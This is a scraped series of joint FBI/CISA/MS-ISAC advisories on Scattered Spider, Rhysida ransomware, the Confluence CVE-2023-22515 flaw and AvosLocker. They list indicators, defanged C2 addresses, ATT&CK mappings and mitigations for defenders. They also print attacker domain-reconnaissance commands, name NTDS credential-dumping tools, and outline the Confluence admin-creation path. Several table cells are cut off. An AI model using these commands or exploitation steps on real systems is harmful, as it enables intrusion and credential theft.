FBI and CISA are seeking any information that can be shared, to include a sample ransom note, communications with Scattered Spider group actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office, report the incident to the FBI Internet Crime Complaint Center (IC3) at IC3.gov, or CISA via CISA’s 24/7 Operations Center ([email protected] or 888-282-0870).
[1] MITRE ATT&CK – Scattered Spider
[2] Trellix - Scattered Spider: The Modus Operandi
[3] Crowdstrike - Not a SIMulation: CrowdStrike Investigations Reveal Intrusion Campaign Targeting Telco and BPO Companies
[4] Crowdstrike - SCATTERED SPIDER Exploits Windows Security Deficiencies with Bring-Your-Own-Vulnerable-Driver Tactic in Attempt to Bypass Endpoint Security
[5] Malwarebytes - Ransomware group steps up, issues statement over MGM Resorts compromise
The information in this report is being provided “as is” for informational purposes only. FBI and CISA do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI and CISA.
November 16, 2023: Initial version.
Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders detailing various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint CSA to disseminate known Rhysida ransomware IOCs and TTPs identified through investigations as recently as September 2023. Rhysida—an emerging ransomware variant—has predominately been deployed against the education, healthcare, manufacturing, information technology, and government sectors since May 2023. The information in this CSA is derived from related incident response investigations and malware analysis of samples discovered on victim networks.
FBI, CISA, and the MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of Rhysida ransomware and other ransomware incidents.
Download the PDF version of this report:
For a downloadable copy of IOCs, see:
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See the ATT&CK Tactics and Techniques section for tables mapped to the threat actors’ activity.
Threat actors leveraging Rhysida ransomware are known to impact “targets of opportunity,” including victims in the education, healthcare, manufacturing, information technology, and government sectors. Open source reporting details similarities between Vice Society (DEV-0832)[1] activity and the actors observed deploying Rhysida ransomware. Additionally, open source reporting[2] has confirmed observed instances of Rhysida actors operating in a ransomware-as-a-service (RaaS) capacity, where ransomware tools and infrastructure are leased out in a profit-sharing model. Any ransoms paid are then split between the group and the affiliates.
For additional information on Vice Society actors and associated activity, see the joint CSA #StopRansomware: Vice Society.
Rhysida actors have been observed leveraging external-facing remote services to initially access and persist within a network. Remote services, such as virtual private networks (VPNs), allow users to connect to internal enterprise network resources from external locations. Rhysida actors have commonly been observed authenticating to internal VPN access points with compromised valid credentials [T1078], notably due to organizations lacking MFA enabled by default. Additionally, actors have been observed exploiting Zerologon (CVE-2020-1472)—a critical elevation of privileges vulnerability in Microsoft’s Netlogon Remote Protocol [T1190]—as well as conducting successful phishing attempts [T1566]. Note: Microsoft released a patch for CVE-2020-1472 on August 11, 2020.[3]
Analysis identified Rhysida actors using living off the land techniques, such as creating Remote Desktop Protocol (RDP) connections for lateral movement [T1021.001], establishing VPN access, and utilizing PowerShell [T1059.001]. Living off the land techniques include using native (built into the operating system) network administration tools to perform operations. This allows the actors to evade detection by blending in with normal Windows systems and network activities.
Ipconfig
[T1016], whoami
[T1033], nltest
[T1482], and several net
commands have been used to enumerate victim environments and gather information about domains. In one instance of using compromised credentials, actors leveraged net
commands within PowerShell to identify logged-in users and performed reconnaissance on network accounts within the victim environment. Note: The following commands were not performed in the exact order listed.
net user [username] /domain
[T1087.002]net group “domain computers” /domain
[T1018]net group “domain admins” /domain
[T1069.002]net localgroup administrators
[T1069.001]Analysis of the master file table (MFT)[4] identified the victim system generated the ntuser.dat
registry hive, which was created when the compromised user logged in to the system for the first time. This was considered anomalous due to the baseline of normal activity for that particular user and system. Note: The MFT resides within the New Technology File System (NTFS) and houses information about a file including its size, time and date stamps, permissions, and data content.
Table 1 lists legitimate tools Rhysida actors have repurposed for their operations. The legitimate tools listed in this joint CSA are all publicly available. Use of these tools should not be attributed as malicious without analytical evidence to support they are used at the direction of or controlled by threat actors.
Disclaimer: Organizations are encouraged to investigate and vet use of these tools prior to performing remediation actions.
Name |
Description |
cmd.exe |
The native command line prompt utility. |
PowerShell.exe |
A native command line tool used to start a Windows PowerShell session in a Command Prompt window. |
PsExec.exe |
A tool included in the PsTools suite used to execute processes remotely. Rhysida actors heavily leveraged this tool for lateral movement and remote execution. |
mstsc.exe |
A native tool that establishes an RDP connection to a host. |
PuTTY.exe |
Rhysida actors have been observed creating Secure Shell (SSH) PuTTy connections for lateral movement. In one example, analysis of PowerShell console host history for a compromised user account revealed Rhysida actors leveraged PuTTy to remotely connect to systems via SSH [T1021.004]. |
PortStarter |
A back door script written in Go that provides functionality for modifying firewall settings and opening ports to pre-configured command and control (C2) servers.[1] |
secretsdump |
A script used to extract credentials and other confidential information from a system. Rhysida actors have been observed using this for NTDS dumping [T1003.003] in various instances. |
ntdsutil.exe |
A standard Windows tool used to interact with the NTDS database. Rhysida actors used this tool to extract and dump the Note: It is strongly recommended that organizations conduct domain-wide password resets and double Kerberos TGT password resets if any indication is found that the |
AnyDesk |
A common software that can be maliciously used by threat actors to obtain remote access and maintain persistence [T1219]. AnyDesk also supports remote file transfer. |
wevtutil.exe |
A standard Windows Event Utility tool used to view event logs. Rhysida actors used this tool to clear a significant number of Windows event logs, including system, application, and security logs [T1070.001]. |
PowerView |
A PowerShell tool used to gain situational awareness of Windows domains. Review of PowerShell event logs identified Rhysida actors using this tool to conduct additional reconnaissance-based commands and harvest credentials. |
In one investigation, Rhysida actors created two folders in the C: drive labeled in
and out
, which served as a staging directory (central location) for hosting malicious executables. The in
folder contained file names in accordance with host names on the victim’s network, likely imported through a scanning tool. The out
folder contained various files listed in Table 2 below. Rhysida actors deployed these tools and scripts to assist system and network-wide encryption.
File Name |
Hash (SHA256) |
Description |
conhost.exe |
6633fa85bb234a75927b23417313e51a4c155e12f71da3959e168851a600b010 |
A ransomware binary. |
psexec.exe |
078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b |
A file used to execute a process on a remote or local host. |
S_0.bat |
1c4978cd5d750a2985da9b58db137fc74d28422f1e087fd77642faa7efe7b597 |
A batch script likely used to place |
1.ps1 |
4e34b9442f825a16d7f6557193426ae7a18899ed46d3b896f6e4357367276183 |
Identifies an extension block list of files to encrypt and not encrypt. |
S_1.bat |
97766464d0f2f91b82b557ac656ab82e15cae7896b1d8c98632ca53c15cf06c4 |
A batch script that copies |
S_2.bat |
918784e25bd24192ce4e999538be96898558660659e3c624a5f27857784cd7e1 |
Executes |
Rhysida ransomware uses a Windows 64-bit Portable Executable (PE) or common object file format (COFF) compiled using MinGW via the GNU Compiler Collection (GCC), which supports various programming languages such as C, C++, and Go. The cryptographic ransomware application first injects the PE into running processes on the compromised system [T1055.002]. Additionally, third-party researchers identified evidence of Rhysida actors developing custom tools with program names set to “Rhysida-0.1” [T1587].
After mapping the network, the ransomware encrypts data using a 4096-bit RSA encryption key with a ChaCha20 algorithm [T1486]. The algorithm features a 256-bit key, a 32-bit counter, and a 96-bit nonce along with a four-by-four matrix of 32-bit words in plain text. Registry modification commands [T1112] are not obfuscated, displayed as plain-text strings and executed via cmd.exe
.
Rhysida’s encryptor runs a file to encrypt and modify all encrypted files to display a .rhysida
extension.[5] Following encryption, a PowerShell command deletes the binary [T1070.004] from the network using a hidden command window [T1564.003]. The Rhysida encryptor allows arguments -d
(select a directory) and -sr
(file deletion), defined by the authors of the code as parseOptions.[6] After the lines of binary strings complete their tasks, they delete themselves through the control panel to evade detection.
Rhysida actors reportedly engage in “double extortion” [T1657]—demanding a ransom payment to decrypt victim data and threatening to publish the sensitive exfiltrated data unless the ransom is paid.[5],[7] Rhysida actors direct victims to send ransom payments in Bitcoin to cryptocurrency wallet addresses provided by the threat actors. As shown in Figure 1, Rhysida ransomware drops a ransom note named “CriticalBreachDetected” as a PDF file—the note provides each company with a unique code and instructions to contact the group via a Tor-based portal.
Identified in analysis and also listed in open source reporting, the contents of the ransom note are embedded as plain-text in the ransom binary, offering network defenders an opportunity to deploy string-based detection for alerting on evidence of the ransom note. Rhysida threat actors may target systems that do not use command-line operating systems. The format of the PDF ransom notes could indicate that Rhysida actors only target systems that are compatible with handling PDF documents.[8]
On November 10, 2023, Sophos published TTPs and IOCs identified from analysis conducted for six separate incidents.[9] The C2 IP addresses listed in Table 3 were derived directly from Sophos’ investigations and are listed on GitHub among other indicators.[10]
C2 IP Address |
---|
5.39.222[.]67 |
5.255.99[.]59 |
51.77.102[.]106 |
108.62.118[.]136 |
108.62.141[.]161 |
146.70.104[.]249 |
156.96.62[.]58 |
157.154.194[.]6 |
Additional IOCs were obtained from FBI, CISA, and the MS-ISAC’s investigations and analysis. The email addresses listed in Table 4 are associated with Rhysida actors’ operations. Rhysida actors have been observed creating Onion Mail email accounts for services or victim communication, commonly in the format: [First Name][Last Name]@onionmail[.]org
.
Email Address |
---|
rhysidaeverywhere@onionmail[.]org |
rhysidaofficial@onionmail[.]org |
Rhysida actors have also been observed using the following files and executables listed in Table 5 to support their operations.
Disclaimer: Organizations are encouraged to investigate the use of these files for related signs of compromise prior to performing remediation actions.
File Name |
Hash (SHA256) |
Sock5.sh |
48f559e00c472d9ffe3965ab92c6d298f8fb3a3f0d6d203cd2069bfca4bf3a57 |
PsExec64.exe |
edfae1a69522f87b12c6dac3225d930e4848832e3c551ee1e7d31736bf4525ef |
PsExec.exe |
078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b |
PsGetsid64.exe |
201d8e77ccc2575d910d47042a986480b1da28cf0033e7ee726ad9d45ccf4daa |
PsGetsid.exe |
a48ac157609888471bf8578fb8b2aef6b0068f7e0742fccf2e0e288b0b2cfdfb |
PsInfo64.exe |
de73b73eeb156f877de61f4a6975d06759292ed69f31aaf06c9811f3311e03e7 |
PsInfo.exe |
951b1b5fd5cb13cde159cebc7c60465587e2061363d1d8847ab78b6c4fba7501 |
PsLoggedon64.exe |
fdadb6e15c52c41a31e3c22659dd490d5b616e017d1b1aa6070008ce09ed27ea |
PsLoggedon.exe |
d689cb1dbd2e4c06cd15e51a6871c406c595790ddcdcd7dc8d0401c7183720ef |
PsService64.exe |
554f523914cdbaed8b17527170502199c185bd69a41c81102c50dbb0e5e5a78d |
PsService.exe |
d3a816fe5d545a80e4639b34b90d92d1039eb71ef59e6e81b3c0e043a45b751c |
Eula.txt |
8329bcbadc7f81539a4969ca13f0be5b8eb7652b912324a1926fc9bfb6ec005a |
psfile64.exe |
be922312978a53c92a49fefd2c9f9cc098767b36f0e4d2e829d24725df65bc21 |
psfile.exe |
4243dc8b991f5f8b3c0f233ca2110a1e03a1d716c3f51e88faf1d59b8242d329 |
pskill64.exe |
7ba47558c99e18c2c6449be804b5e765c48d3a70ceaa04c1e0fae67ff1d7178d |
pskill.exe |
5ef168f83b55d2cbd2426afc5e6fa8161270fa6a2a312831332dc472c95dfa42 |
pslist64.exe |
d3247f03dcd7b9335344ebba76a0b92370f32f1cb0e480c734da52db2bd8df60 |
pslist.exe |
ed05f5d462767b3986583188000143f0eb24f7d89605523a28950e72e6b9039a |
psloglist64.exe |
5e55b4caf47a248a10abd009617684e969dbe5c448d087ee8178262aaab68636 |
psloglist.exe |
dcdb9bd39b6014434190a9949dedf633726fdb470e95cc47cdaa47c1964b969f |
pspasswd64.exe |
8d950068f46a04e77ad6637c680cccf5d703a1828fbd6bdca513268af4f2170f |
pspasswd.exe |
6ed5d50cf9d07db73eaa92c5405f6b1bf670028c602c605dfa7d4fcb80ef0801 |
psping64.exe |
d1f718d219930e57794bdadf9dda61406294b0759038cef282f7544b44b92285 |
psping.exe |
355b4a82313074999bd8fa1332b1ed00034e63bd2a0d0367e2622f35d75cf140 |
psshutdown64.exe |
4226738489c2a67852d51dbf96574f33e44e509bc265b950d495da79bb457400 |
psshutdown.exe |
13fd3ad690c73cf0ad26c6716d4e9d1581b47c22fb7518b1d3bf9cfb8f9e9123 |
pssuspend64.exe |
4bf8fbb7db583e1aacbf36c5f740d012c8321f221066cc68107031bd8b6bc1ee |
pssuspend.exe |
95a922e178075fb771066db4ab1bd70c7016f794709d514ab1c7f11500f016cd |
PSTools.zip |
a9ca77dfe03ce15004157727bb43ba66f00ceb215362c9b3d199f000edaa8d61 |
Pstools.chm |
2813b6c07d17d25670163e0f66453b42d2f157bf2e42007806ebc6bb9d114acc |
psversion.txt |
8e43d1ddbd5c129055528a93f1e3fab0ecdf73a8a7ba9713dc4c3e216d7e5db4 |
psexesvc.exe |
This artifact is created when a user establishes a connection using |
See Tables 6-15 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
Additional notable TTPs have been published by the Check Point Incident Response Team.[11]
Technique Title |
ID |
Use |
---|---|---|
Develop Capabilities |
Rhysida actors have been observed developing resources and custom tools, particularly with program names set to “Rhysida-0.1” to gain access to victim systems. |
Technique Title |
ID |
Use |
---|---|---|
Valid Accounts |
Rhysida actors are known to use valid credentials to access internal VPN access points of victims. |
|
Exploit Public-Facing Application |
Rhysida actors have been identified exploiting Zerologon, a critical elevation of privilege vulnerability within Microsoft’s Netlogon Remote Protocol. |
|
Phishing |
Rhysida actors are known to conduct successful phishing attacks. |
Technique Title |
ID |
Use |
---|---|---|
Command and Scripting Interpreter: PowerShell |
Rhysida actors used PowerShell commands ( |
|
Command and Scripting Interpreter: Windows Command Shell |
Rhysida actors used batch scripting to place |
Technique Title |
ID |
Use |
---|---|---|
Process Injection: Portable Executable Injection |
Rhysida actors injected a Windows 64-bit PE cryptographic ransomware application into running processes on compromised systems. |
Technique Title |
ID |
Use |
---|---|---|
Indicator Removal: Clear Windows Event Logs |
Rhysida actors used |
|
Indicator Removal: File Deletion |
Rhysida actors used PowerShell commands to delete binary strings. |
|
Hide Artifacts: Hidden Window |
Rhysida actors have executed hidden PowerShell windows. |
Technique Title |
ID |
Use |
---|---|---|
OS Credential Dumping: NTDS |
Rhysida actors have been observed using |
|
Modify Registry |
Rhysida actors were observed running registry modification commands via |
Technique Title |
ID |
Use |
System Network Configuration Discovery |
Rhysida actors used the |
|
Remote System Discovery |
Rhysida actors used the command |
|
System Owner/User Discovery |
Rhysida actors leveraged |
|
Permission Groups Discovery: Local Groups |
Rhysida actors used the command |
|
Permission Groups Discovery: Domain Groups |
Rhysida actors used the command |
|
Account Discovery: Domain Account |
Rhysida actors used the command |
|
Domain Trust Discovery |
Rhysida actors used the Windows utility |
Technique Title |
ID |
Use |
---|---|---|
Remote Services: Remote Desktop Protocol |
Rhysida actors are known to use RDP for lateral movement. |
|
Remote Services: SSH |
Rhysida actors used compromised user credentials to leverage PuTTy and remotely connect to victim systems via SSH. |
Technique Title |
ID |
Use |
---|---|---|
Remote Access Software |
Rhysida actors have been observed using the AnyDesk software to obtain remote access to victim systems and maintain persistence. |
Technique Title |
ID |
Use |
---|---|---|
Data Encrypted for Impact |
Rhysida actors encrypted victim data using a 4096-bit RSA encryption key that implements a ChaCha20 algorithm. |
|
Financial Theft |
Rhysida actors reportedly engage in “double extortion”— demanding a ransom payment to decrypt victim data and threatening to publish the sensitive exfiltrated data unless the ransom is paid. |
FBI, CISA, and the MS-ISAC recommend that organizations implement the mitigations below to improve your organization’s cybersecurity posture. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, and TTPs. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
These mitigations apply to all critical infrastructure organizations and network defenders. FBI, CISA, and the MS-ISAC recommend incorporating secure-by-design and -default principles, limiting the impact of ransomware techniques and strengthening overall security posture. For more information on secure by design, see CISA’s Secure by Design webpage.
In addition, FBI, CISA, and the MS-ISAC recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the impact and risk of compromise by ransomware or data extortion actors:
In addition to applying mitigations, FBI, CISA, and the MS-ISAC recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. FBI, CISA, and the MS-ISAC recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
FBI, CISA, and the MS-ISAC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Rhysida actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.
Additional details requested include: a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host and network-based indicators.
FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other threat actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to the FBI’s Internet Crime Complaint Center (IC3) at Ic3.gov, a local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center at [email protected] or (888) 282-0870.
Sophos contributed to this CSA.
The information in this report is being provided “as is” for informational purposes only. FBI, CISA, and the MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, and the MS-ISAC.
November 15, 2023: Initial version.
The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint Cybersecurity Advisory (CSA) in response to the active exploitation of CVE-2023-22515. This recently disclosed vulnerability affects certain versions of Atlassian Confluence Data Center and Server, enabling malicious cyber threat actors to obtain initial access to Confluence instances by creating unauthorized Confluence administrator accounts. Threat actors exploited CVE-2023-22515 as a zero-day to obtain access to victim systems and continue active exploitation post-patch. Atlassian has rated this vulnerability as critical; CISA, FBI, and MS-ISAC expect widespread, continued exploitation due to ease of exploitation.
CISA, FBI, and MS-ISAC strongly encourage network administrators to immediately apply the upgrades provided by Atlassian. CISA, FBI, and MS-ISAC also encourage organizations to hunt for malicious activity on their networks using the detection signatures and indicators of compromise (IOCs) in this CSA. If a potential compromise is detected, organizations should apply the incident response recommendations.
For additional information on upgrade instructions, a complete list of affected product versions, and IOCs, see Atlassian’s security advisory for CVE-2023-22515.[1] While Atlassian’s advisory provides interim measures to temporarily mitigate known attack vectors, CISA, FBI, and MS-ISAC strongly encourage upgrading to a fixed version or taking servers offline to apply necessary updates.
Download the PDF version of this report:
For a downloadable copy of IOCs, see:
CVE-2023-22515 is a critical Broken Access Control vulnerability affecting the following versions of Atlassian Confluence Data Center and Server. Note: Atlassian Cloud sites (sites accessed by an atlassian.net domain), including Confluence Data Center and Server versions before 8.0.0, are not affected by this vulnerability.
|
|
|
Unauthenticated remote threat actors can exploit this vulnerability to create unauthorized Confluence administrator accounts and access Confluence instances. More specifically, threat actors can change the Confluence server’s configuration to indicate the setup is not complete and use the /setup/setupadministrator.action endpoint to create a new administrator user. The vulnerability is triggered via a request on the unauthenticated /server-info.action endpoint.
Considering the root cause of the vulnerability allows threat actors to modify critical configuration settings, CISA, FBI, and MS-ISAC assess that the threat actors may not be limited to creating new administrator accounts. Open source further indicates an Open Web Application Security Project (OWASP) classification of injection (i.e., CWE-20: Improper Input Validation) is an appropriate description.[2] Atlassian released a patch on October 4, 2023, and confirmed that threat actors exploited CVE-2023-22515 as a zero-day—a previously unidentified vulnerability.[1]
On October 5, 2023, CISA added this vulnerability to its Known Exploited Vulnerabilities Catalog based on evidence of active exploitation. Due to the ease of exploitation, CISA, FBI, and MS-ISAC expect to see widespread exploitation of unpatched Confluence instances in government and private networks.
Post-exploitation exfiltration of data can be executed through of a variety of techniques. A predominant method observed involves the use of cURL—a command line tool used to transfer data to or from a server. An additional data exfiltration technique observed includes use of Rclone [S1040]—a command line tool used to sync data to cloud and file hosting services such as Amazon Web Services and China-based UCloud Information Technology Limited. Note: This does not preclude the effectiveness of alternate methods, but highlights methods observed to date. Threat actors were observed using Rclone to either upload a configuration file to victim infrastructure or enter cloud storage credentials via the command line. Example configuration file templates are listed in the following Figures 1 and 2, which are populated with the credentials of the exfiltration point:
[s3] |
[minio] |
The following User-Agent strings were observed in request headers. Note: As additional threat actors begin to use this CVE due to the availability of publicly posted proof-of-concept code, an increasing variation in User-Agent strings is expected:
Python-requests/2.27.1
curl/7.88.1
Disclaimer: Organizations are recommended to investigate or vet these IP addresses prior to taking action, such as blocking.
The following IP addresses were obtained from FBI investigations as of October 2023 and observed conducting data exfiltration:
170.106.106[.]16
43.130.1[.]222
152.32.207[.]23
199.19.110[.]14
95.217.6[.]16
(Note: This is the official rclone.org website)Additional IP addresses observed sending related exploit traffic have been shared by Microsoft.[3]
Network defenders are encouraged to review and deploy Proofpoint’s Emerging Threat signatures. See Ruleset Update Summary - 2023/10/12 - v10438.[4]
Network defenders are also encouraged to aggregate application and server-level logging from Confluence servers to a logically separated log search and alerting system, as well as configure alerts for signs of exploitation (as detailed in Atlassian’s security advisory).
Organizations are encouraged to review all affected Confluence instances for evidence of compromise, as outlined by Atlassian.[1] If compromise is suspected or detected, organizations should assume that threat actors hold full administrative access and can perform any number of unfettered actions—these include but are not limited to exfiltration of content and system credentials, as well as installation of malicious plugins.
If a potential compromise is detected, organizations should:
These mitigations apply to all organizations using non-cloud Atlassian Confluence Data Center and Server software. CISA, FBI, and MS-ISAC recommend that software manufacturers incorporate secure by design and default principles and tactics into their software development practices to reduce the prevalence of Broken Access Control vulnerabilities, thus strengthening the secure posture for their customers.
For more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide.
As of October 10, 2023, proof-of-concept exploits for CVE-2023-22515 have been observed in open source publications.[5] While there are immediate concerns such as increased risk of exploitation and the potential integration into malware toolkits, the availability of a proof-of-concept presents an array of security and operational challenges that extend beyond these immediate issues. Immediate action is strongly advised to address the potential risks associated with this development.
CISA, FBI, and MS-ISAC recommend taking immediate action to address the potential associated risks and encourage organizations to:
[1] Atlassian: CVE-2023-22515 - Broken Access Control Vulnerability in Confluence Data Center and Server
[2] Rapid7: CVE-2023-22515 Analysis
[3] Microsoft: CVE-2023-22515 Exploit IP Addresses
[4] Proofpoint: Emerging Threats Rulesets
[5] Confluence CVE-2023-22515 Proof of Concept - vulhub
[6] Atlassian Support: Upgrading Confluence
The information in this report is being provided “as is” for informational purposes only. CISA, FBI, and MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA, FBI, and MS-ISAC.
October 16, 2023: Initial version.
Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) to disseminate known IOCs, TTPs, and detection methods associated with the AvosLocker variant identified through FBI investigations as recently as May 2023. AvosLocker operates under a ransomware-as-a-service (RaaS) model. AvosLocker affiliates have compromised organizations across multiple critical infrastructure sectors in the United States, affecting Windows, Linux, and VMware ESXi environments. AvosLocker affiliates compromise organizations’ networks by using legitimate software and open-source remote system administration tools. AvosLocker affiliates then use exfiltration-based data extortion tactics with threats of leaking and/or publishing stolen data.
This joint CSA updates the March 17, 2022, AvosLocker ransomware joint CSA, Indicators of Compromise Associated with AvosLocker ransomware, released by FBI and the Department of the Treasury’s Financial Crimes Enforcement Network (FinCEN). This update includes IOCs and TTPs not included in the previous advisory and a YARA rule FBI developed after analyzing a tool associated with an AvosLocker compromise.
FBI and CISA encourage critical infrastructure organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of AvosLocker ransomware and other ransomware incidents.
Download the PDF version of this report:
For a downloadable copy of IOCs, see:
Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 13. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
AvosLocker affiliates use legitimate software and open-source tools during ransomware operations, which include exfiltration-based data extortion. Specifically, affiliates use:
FBI has also observed AvosLocker affiliates:
.bat
) scripts [T1059.003] for lateral movement, privilege escalation, and disabling antivirus software.For additional TTPs, see joint CSA Indicators of Compromise Associated with AvosLocker Ransomware.
See Tables 1 and 2 below for IOCs obtained from January 2023–May 2023.
Files and Tools |
MD5 |
psscriptpolicytest_im2hdxqi.g0k.ps1 |
829f2233a1cd77e9ec7de98596cd8165 |
psscriptpolicytest_lysyd03n.o10.ps1 |
6ebd7d7473f0ace3f52c483389cab93f |
psscriptpolicytest_1bokrh3l.2nw.ps1 |
10ef090d2f4c8001faadb0a833d60089 |
psscriptpolicytest_nvuxllhd.fs4.ps1 |
8227af68552198a2d42de51cded2ce60 |
psscriptpolicytest_2by2p21u.4ej.ps1 |
9d0b3796d1d174080cdfdbd4064bea3a |
psscriptpolicytest_te5sbsfv.new.ps1 |
af31b5a572b3208f81dbf42f6c143f99 |
psscriptpolicytest_v3etgbxw.bmm.ps1 |
1892bd45671f17e9f7f63d3ed15e348e |
psscriptpolicytest_fqa24ixq.dtc.ps1 |
cc68eaf36cb90c08308ad0ca3abc17c1 |
psscriptpolicytest_jzjombgn.sol.ps1 |
646dc0b7335cffb671ae3dfd1ebefe47 |
psscriptpolicytest_rdm5qyy1.phg.ps1 |
609a925fd253e82c80262bad31637f19 |
psscriptpolicytest_endvm2zz.qlp.ps1 |
c6a667619fff6cf44f447868d8edd681 |
psscriptpolicytest_s1mgcgdk.25n.ps1 |
3222c60b10e5a7c3158fd1cb3f513640 |
psscriptpolicytest_xnjvzu5o.fta.ps1 |
90ce10d9aca909a8d2524bc265ef2fa4 |
psscriptpolicytest_satzbifj.oli.ps1 |
44a3561fb9e877a2841de36a3698abc0 |
psscriptpolicytest_grjck50v.nyg.ps1 |
5cb3f10db11e1795c49ec6273c52b5f1 |
psscriptpolicytest_0bybivfe.x1t.ps1 |
122ea6581a36f14ab5ab65475370107e |
psscriptpolicytest_bzoicrns.kat.ps1 |
c82d7be7afdc9f3a0e474f019fb7b0f7 |
Files and Tools |
SHA256 |
BEACON.PS1 |
e68f9c3314beee640cc32f08a8532aa8dcda613543c54a83680c21d7cd49ca0f |
Encoded PowerShell script |
ad5fd10aa2dc82731f3885553763dfd4548651ef3e28c69f77ad035166d63db7 |
Encoded PowerShell script |
48dd7d519dbb67b7a2bb2747729fc46e5832c30cafe15f76c1dbe3a249e5e731 |
Files and Tools |
SHA1 |
PowerShell backdoor |
2d1ce0231cf8ff967c36bbfc931f3807ddba765c |
Email Address |
---|
keishagrey994@outlook[.]com |
Virtual Currency Wallets |
a6dedd35ad745641c52d6a9f8da1fb09101d152f01b4b0e85a64d21c2a0845ee |
bfacebcafff00b94ad2bff96b718a416c353a4ae223aa47d4202cdbc31e09c92 |
418748c1862627cf91e829c64df9440d19f67f8a7628471d4b3a6cc5696944dd |
bc1qn0u8un00nl6uz6uqrw7p50rg86gjrx492jkwfn |
Based on an investigation by an advanced digital forensics group, FBI created the following YARA rule to detect the signature for a file identified as enabling malware. NetMonitor.exe
is a malware masquerading as a legitimate process and has the appearance of a legitimate network monitoring tool. This persistence tool sends pings from the network every five minutes. The NetMonitor executable is configured to use an IP address as its command server, and the program communicates with the server over port 443. During the attack, traffic between NetMonitor and the command server is encrypted, where NetMonitor functions like a reverse proxy and allows actors to connect to the tool from outside the victim’s network.
rule NetMonitor |
See Tables 3-7 for all referenced threat actor tactics and techniques in this advisory.
Initial Access |
||
---|---|---|
Technique Title |
ID |
Use |
External Remote Services |
AvosLocker affiliates use remote system administration tools—Splashtop Streamer, Tactical RMM, PuTTy, AnyDesk, PDQ Deploy, and Atera Agent—to access backdoor access vectors. |
Execution | ||
---|---|---|
Technique Title |
ID |
Use |
Command and Scripting Interpreter: PowerShell |
AvosLocker affiliates use custom PowerShell scripts to enable privilege escalation, lateral movement, and to disable antivirus. |
|
Command and Scripting Interpreter: Windows Command Shell |
AvosLocker affiliates use custom |
|
Windows Management Instrumentation |
AvosLocker affiliates use legitimate Windows tools, such as PsExec and Nltest in their execution. |
Persistence |
||
---|---|---|
Technique Title |
ID |
Use |
Server Software Component |
AvosLocker affiliates have uploaded and used custom webshells to enable network access. |
Credential Access |
||
---|---|---|
Technique Title |
ID |
Use |
Credentials from Password Stores |
